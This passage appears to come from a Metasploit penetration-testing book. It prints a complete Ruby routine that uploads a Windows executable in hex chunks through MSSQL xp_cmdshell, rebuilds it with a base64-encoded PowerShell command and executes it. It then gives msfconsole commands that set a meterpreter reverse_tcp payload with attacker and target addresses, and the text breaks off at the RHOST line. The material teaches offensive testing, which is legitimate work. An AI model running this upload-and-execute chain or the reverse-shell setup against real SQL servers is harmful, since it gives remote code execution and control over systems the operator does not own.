background image

Building Your Own Module

195

The following shows the entire 

mssql.rb

 file:

#
# Upload and execute a Windows binary through MSSQL queries and Powershell
#
def powershell_upload_exec(exe, debug=false)

          # hex converter
          hex = exe.unpack("H*")[0]
          # create random alpha 8 character names
          #var_bypass  = rand_text_alpha(8)
          var_payload = rand_text_alpha(8)
          print_status("Warning: This module will leave #{var_payload}.exe in the SQL 

Server %TEMP% directory")

          # our payload converter, grabs a hex file and converts it to binary for us through 

powershell

          h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);$s 

= $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[]$($s 
.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring
($($_*2),2),16)};[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}

.exe',$b)"

          h2b_unicode=Rex::Text.to_unicode(h2b)
          # base64 encode it, this allows us to perform execution through powershell without 

registry changes

          h2b_encoded = Rex::Text.encode_base64(h2b_unicode)
          print_status("Uploading the payload #{var_payload}, please be patient...")
          idx = 0
          cnt = 500
          while(idx < hex.length - 1)
               mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
               idx += cnt
          end
          print_status("Converting the payload utilizing PowerShell EncodedCommand...")
          mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug)
          mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
          print_status("Executing the payload...")
          mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
          print_status("Be sure to cleanup #{var_payload}.exe...")
     end

Running the Exploit

With our work on 

mssql_powershell.rb

 and 

mssql.rb

 complete, we can run the 

exploit through Metasploit and 

msfconsole

. But before we do, we need to 

make sure that PowerShell is installed. Then we can run the following com-
mands to execute our newly created exploit:

msf > 

use windows/mssql/mssql_powershell

msf exploit(mssql_powershell) > 

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_powershell) > 

set LHOST 172.16.32.129

LHOST => 172.16.32.129
msf exploit(mssql_powershell) > 

set RHOST 172.16.32.136